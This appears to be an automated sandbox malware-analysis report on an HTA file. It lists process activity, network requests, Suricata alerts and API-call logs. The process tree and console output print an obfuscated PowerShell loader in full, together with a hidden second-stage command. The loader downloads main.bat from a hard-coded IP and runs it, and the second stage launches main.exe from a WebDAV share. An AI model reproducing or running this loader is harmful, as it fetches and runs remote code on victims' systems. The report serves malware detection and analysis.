Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 17, 2023, 10:08 a.m.	Oct. 17, 2023, 10:11 a.m.

Size	10.3KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`db2fde02752a7a3ddcbf39589acdf815`
SHA256	`e44605478a95d78476e430f40a5720fe3286b768cd7ab6e52943553516c2b484`
CRC32	`FFAF323E`
ssdeep	`192:xfsOsiCk2SOsCjFeZ2ZlHeBsehk0PHi+PLr:xf2+H`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\test.hta
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcEHEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVIbAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOcSGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH)};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:AppData + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR @(67946,67958,67958,67954,67900,67889,67889,67899,67891,67888,67892,67890,67897,67888,67891,67898,67893,67888,67899,67900,67898,67890,67890,67890,67889,67951,67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZqInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH;
  2656
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\main.bat" "
    2808
    - powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe
      2912

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
91.207.183.9	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 91.207.183.9:8000 -> 192.168.56.101:49163	2026989	ET HUNTING PowerShell Hidden Window Command Common In Powershell Stagers M1	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 17, 2023, 10:08 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 17, 2023, 10:08 a.m.			0	0
IsDebuggerPresent Oct. 17, 2023, 10:08 a.m.			0	0

Command line console output was observed (37 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: At line:1 char:718 console_handle: 0x00000053	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: + function KEPoAX($EfRUfukKc, $GYqeeXtk){[IO.File]::WriteAllBytes($EfRUfukKc, $ console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: GYqeeXtk)};function OhkhTpfBZqInCZvmW($EfRUfukKc){if($EfRUfukKc.EndsWith((ajAJb console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: SPVIbAhoypR @(67888,67942,67950,67950))) -eq $True){rundll32.exe $EfRUfukKc }el console_handle: 0x00000077	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: seif($EfRUfukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67954,67957,67891))) -eq $Tr console_handle: 0x00000083	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: ue){powershell.exe -ExecutionPolicy unrestricted -File $EfRUfukKc}elseif($EfRUf console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: ukKc.EndsWith((ajAJbSPVIbAhoypR @(67888,67951,67957,67947))) -eq $True){misexec console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: /qn /i $EfRUfukKc}else{Start-Process $EfRUfukKc}};function TBHPplqmTGEcWZ($gcE console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: HEosamOU){$MKNeTksSViYoWh = New-Object (ajAJbSPVIbAhoypR @(67920,67943,67958,67 console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: 888,67929,67943,67940,67909,67950,67947,67943,67952,67958));[Net.ServicePointMa console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: nager]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GYqeeXtk = console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: $MKNeTksSViYoWh.DownloadData($gcEHEosamOU);return $GYqeeXtk};function ajAJbSPVI console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: bAhoypR($otOqVOnyi){$uYdhuBYtOsucbcH=67842;$zVMJBrInhZPv=$Null;foreach($ekRAhOc console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: SGqDyRwp in $otOqVOnyi){$zVMJBrInhZPv+=[char]($ekRAhOcSGqDyRwp-$uYdhuBYtOsucbcH console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: )};return $zVMJBrInhZPv};function KwcENQGqzCexrmkvH(){$eFuIwrNOzJBJS = $env:App console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: Data + '\';$gZwVPv = $eFuIwrNOzJBJS + 'main.bat'; if (Test-Path -Path $gZwVPv){ console_handle: 0x00000107	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: OhkhTpfBZqInCZvmW $gZwVPv;}Else{ $cNQduXeOw = TBHPplqmTGEcWZ (ajAJbSPVIbAhoypR console_handle: 0x00000113	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: 67939,67947,67952,67888,67940,67939,67958));KEPoAX $gZwVPv $cNQduXeOw;OhkhTpfBZ console_handle: 0x00000137	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: qInCZvmW $gZwVPv;};;;;}KwcENQGqzCexrmkvH; console_handle: 0x00000143	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000014f	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000015b	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe console_handle: 0x00000007	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe console_handle: 0x00000007	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: The term '\\91.207.183.9@8000\DavWWWRoot\main.exe' is not recognized as the nam console_handle: 0x00000023	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: e of a cmdlet, function, script file, or operable program. Check the spelling o console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: f the name, or if a path was included, verify that the path is correct and try console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: again. console_handle: 0x00000047	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: At line:1 char:40 console_handle: 0x00000053	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: + \\91.207.183.9@8000\DavWWWRoot\main.exe <<<< console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: + CategoryInfo : ObjectNotFound: (\\91.207.183.9@8000\DavWWWRoot\ console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: main.exe:String) [], CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Oct. 17, 2023, 10:08 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 92 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dbd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053d8d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053da18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0053dc98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a3f38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a40b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a40b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 17, 2023, 10:08 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005a40b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 17, 2023, 10:08 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://91.207.183.9:8000/main.bat

Performs some HTTP requests (1 event)

request

GET http://91.207.183.9:8000/main.bat

Allocates read-write-execute memory (usually to unpack itself) (50 out of 294 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x717e2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02777000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02775000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0277c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 17, 2023, 10:08 a.m.	process_identifier: 2656 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
